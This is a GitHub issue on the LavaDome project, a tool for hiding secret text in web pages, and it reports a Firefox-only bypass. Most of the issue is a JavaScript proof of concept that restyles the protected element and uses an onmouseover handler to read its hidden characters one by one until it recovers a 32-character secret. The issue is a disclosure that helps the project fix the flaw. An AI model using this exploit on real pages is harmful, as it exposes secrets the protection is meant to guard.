Skip to content

LavaDome is vulnerable to onmouseover  #37

Open
@weizman

Description

@weizman

Another one by @masatokinugawa (FF only):

let foundChars = "";
PRIVATE.onmouseover = e => {
  const originalTarget = e.originalTarget;
  const host = originalTarget.parentNode.host;
  if (host && Array.from(host.parentElement.children).indexOf(host) === 0) {
    foundChars += originalTarget.innerText;
    console.log(foundChars);
    if (foundChars.length === 32) {
      alert(foundChars);
    }
    host.remove();
  }
}
PRIVATE.style.position = "absolute";
PRIVATE.style.top = "0";
PRIVATE.style.left = "0";
PRIVATE.style.padding = "0";
PRIVATE.style.margin = "0";
PRIVATE.style.fontFamily = "Consolas";
PRIVATE.style.letterSpacing = "100vw";
PRIVATE.style.fontSize = "100vw";

Metadata

Metadata

Assignees

No one assigned

    Labels

    bypassLavaDome security breachfirefoxFirefox related

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions